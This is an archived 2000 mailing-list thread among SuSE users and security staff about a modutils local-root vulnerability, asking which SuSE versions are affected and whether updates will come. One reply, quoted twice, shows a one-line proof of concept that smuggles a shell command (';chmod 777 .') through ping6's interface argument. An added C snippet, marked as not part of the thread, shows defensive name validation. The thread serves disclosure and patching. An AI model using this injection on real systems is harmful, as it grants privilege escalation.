Hi,
I'm a little confused about the modutils / modules security upgrade.
The announcement from SuSE stated that 6.4/7.0 are affected, as it's only more recent versions of modutils that are vulnerable.
However, the announcement on the kernel mailing list stated that modutils versions > 2.1.121 are vulnerable. Checking on my SuSE 6.1 system with /sbin/modprobe -V shows that it's running version 2.2.2-pre6.
So - are versions of SuSE prior to 6.4 vulnerable to this problem as well? If so, will SuSE be producing an upgrade, or do I need to upgrade modutils from source?
Thanks,
J.
| John Patterson / Jarel on Snowplains (telnet to snowplains.org 3456) |
| Email: jarel@snowplains.org | Web: http://snowplains.org/~jarel/ |
On Tue, 14 Nov 2000, John wrote:
> Hi,
> I'm a little confused about the modutils / modules security upgrade.
> The announcement from SuSE stated that 6.4/7.0 are affected, as it's only more recent versions of modutils that are vulnerable.
> However, the announcement on the kernel mailing list stated that modutils versions > 2.1.121 are vulnerable. Checking on my SuSE 6.1 system with /sbin/modprobe -V shows that it's running version 2.2.2-pre6.
> So - are versions of SuSE prior to 6.4 vulnerable to this problem as well? If so, will suse be producing an upgrade, or do I need to upgrade modutils from source?
Since this bug needs ping6 to be exploited and this isn't shipped on <6.4, it could be hard to exploit. If paranoid, update modules package. It can't hurt you :)
S.
Hi!
Sebastian Krahmer wrote on Tue, 14 Nov 2000 at 11:49:
> On Tue, 14 Nov 2000, John wrote:
>> versions > 2.1.121 are vulnerable. Checking on my SuSE 6.1 system with /sbin/modprobe -V shows that it's running version 2.2.2-pre6.
> Since this bug needs ping6 to be exploited and this isn't shipped on <6.4, it could be hard to exploit. If paranoid, update modules package. It can't hurt you :)
Maybe I got something wrong; as far as I understand the problem, the bug does not "need" ping6 to be exploited, but it's the published exploit (bugtraq) being written to use ping6 for its means.
In other words: SuSE < 6.4 should be script kiddie safe (as the published exploit will not work), but it is at least possible, if not likely, that our boxes still are vulnerable...
I'd really like to see updated packages from SuSE.
Bye, Bastian
--
Bastian Friedrich bastian@bastian-friedrich.de
Address & Fon available on my HP http://www.bastian-friedrich.de/
\~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\
\ ech`echo "xiun" | tr nu oc | sed 'sx\([sx]\)\([xoi]\)xo un\2\1 is xg'`ol
> Maybe I got something wrong; as far as I understand the problem, the bug does not "need" ping6 to be exploited, but it's the published exploit (bugtraq) being written to use ping6 for its means.
> In other words: SuSE < 6.4 should be script kiddie safe (as the published exploit will not work), but it is at least possible, if not likely, that our boxes still are vulnerable...
> I'd really like to see updated packages from SuSE.
> Bye, Bastian
Not quite. The "exploit" is trivial:
cd /
ping6 -I ';chmod 777 .'
ls -lad .
You don't need any kind of script. But: ping6 is the only program known so
far that could trigger the loading of modules with arbitrary names.
Roman.
--
| Roman Drahtmüller
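An added example, not part of the thread and not modutils or SuSE code: in the commands quoted above, the string given to ping6 -I ends up as a module name and its `;` is treated as a command separator. The sketch below shows the defensive counterpart for any privileged helper that forwards a caller-supplied name to a module loader: check the name against a strict character set and run the loader without a shell. The function names, the length bound and the loader path are assumptions made for this illustration.

```c
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define MODNAME_MAX 64  /* assumed bound for this example */

/* Return 1 only for non-empty, bounded names made of [A-Za-z0-9_-] that do
 * not start with '-' (which a loader could parse as an option). */
int module_name_is_safe(const char *name)
{
    size_t len, i;

    if (name == NULL)
        return 0;
    len = strlen(name);
    if (len == 0 || len >= MODNAME_MAX || name[0] == '-')
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '_' || c == '-'))
            return 0;   /* rejects ';', spaces, quotes, '$', '`', ... */
    }
    return 1;
}

/* Run the loader with the name as a single argv entry, never through a
 * shell. Returns the loader's exit status, or -1 if the name is rejected
 * or the child could not be started or waited for. */
int load_module_checked(const char *loader, const char *name)
{
    pid_t pid;
    int status;

    if (!module_name_is_safe(name))
        return -1;
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)loader, (char *)name, NULL };
        char *const envp[] = { "PATH=/sbin:/bin", NULL };
        execve(loader, argv, envp);
        _exit(127);     /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

With the string from the thread, `load_module_checked("/sbin/modprobe", ";chmod 777 .")` returns -1 before any process is started.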
On Tue, 14 Nov 2000, Roman Drahtmueller wrote:
> You don't need any kind of script. But: ping6 is the only program known so far that could trigger the loading of modules with arbitrary names.
Maybe, but Bastian's original question remains unanswered: SuSE 6.3 shipped with modules-2.3.6-3. Does this version already contain the vulnerability? And if so, can we expect a fixed RPM from SuSE?
With a few million lines of custom code on 500+ SuSE 6.3 boxes here, it is not too assuring that ping6 is the only package _you_ know to exploit the bug.
Cheers, Knut
--
Knut Woller     My opinions do not necessarily
DESY -IT-       reflect the views of my employer.
Hamburg         And vice versa.
> Maybe, but Bastian's original question remains unanswered: SuSE 6.3 shipped with modules-2.3.6-3. Does this version already contain the vulnerability? And if so, can we expect a fixed RPM from SuSE?
> With a few million lines of custom code on 500+ SuSE 6.3 boxes here, it is not too assuring that ping6 is the only package _you_ know to exploit the bug.
> Cheers, Knut
Right. I'll have the other distributions updated, too.
It's better...
Roman.
--
| Roman Drahtmüller
On Tue, 14 Nov 2000, Roman Drahtmueller wrote:
>> Maybe I got something wrong; as far as I understand the problem, the bug does not "need" ping6 to be exploited, but it's the published exploit (bugtraq) being written to use ping6 for its means.
>> In other words: SuSE < 6.4 should be script kiddie safe (as the published exploit will not work), but it is at least possible, if not likely, that our boxes still are vulnerable...
>> I'd really like to see updated packages from SuSE.
>> Bye, Bastian
> Not quite. The "exploit" is trivial:
> cd /
> ping6 -I ';chmod 777 .'
> ls -lad .
> You don't need any kind of script. But: ping6 is the only program known so far that could trigger the loading of modules with arbitrary names.
Yes. For SuSE. Our ping is different from RH. They are vuln via ping :)
However, the modules package has this bug. What quickly comes to mind is pppd and traceroute (besides ping6). At least traceroute didn't work for me on some systems.
S.
...
> Not quite. The "exploit" is trivial:
> cd /
> ping6 -I ';chmod 777 .'
> ls -lad .
> You don't need any kind of script. But: ping6 is the only program known so far that could trigger the loading of modules with arbitrary names.
...
Hmm, as far as my SuSE 7 Pro is concerned the module is always loaded and I found no cronjob or whatever which does some rmmod -a. So as long as I don't unload it's not exploitable anyway - or did I miss the point?
Tobias
participants (6)
- Bastian Friedrich
- John
- Knut Woller
- Roman Drahtmueller
- Sebastian Krahmer
- tlietke@pop.gmx.de